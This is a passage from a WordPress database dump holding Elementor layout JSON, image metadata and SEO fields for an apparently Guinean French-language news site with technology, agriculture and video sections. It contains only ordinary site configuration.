\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"2\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"300\",\"twitter_widget_tweet_limit\":\"2\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"2\"],\"excerpt_value\":10,\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3066,920,'_elementor_version','0.4'),(3067,920,'_elementor_css','a:3:{s:4:\"time\";i:1511252064;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(3069,921,'_edit_last','1'),(3070,921,'_edit_lock','1511347318:1'),(3071,922,'_wp_attached_file','2017/11/kady-tounkara-1068x801-696x522.jpg'),(3072,922,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:696;s:6:\"height\";i:522;s:4:\"file\";s:42:\"2017/11/kady-tounkara-1068x801-696x522.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"kady-tounkara-1068x801-696x522-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"kady-tounkara-1068x801-696x522-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3073,921,'_thumbnail_id','922'),(3074,921,'_wp_page_template','default'),(3077,921,'_yoast_wpseo_focuskw_text_input','Mariage en Guinée'),(3078,921,'_yoast_wpseo_focuskw','Mariage en Guinée'),(3079,921,'_yoast_wpseo_linkdex','39'),(3080,921,'_yoast_wpseo_content_score','30'),(3081,921,'_yoast_wpseo_primary_category','1'),(3082,921,'post_views_count','212'),(3084,924,'_elementor_edit_mode','builder'),(3085,924,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":41},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":2},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":19},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":16},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":0,\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":24},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\",\"use_icon\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"1\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\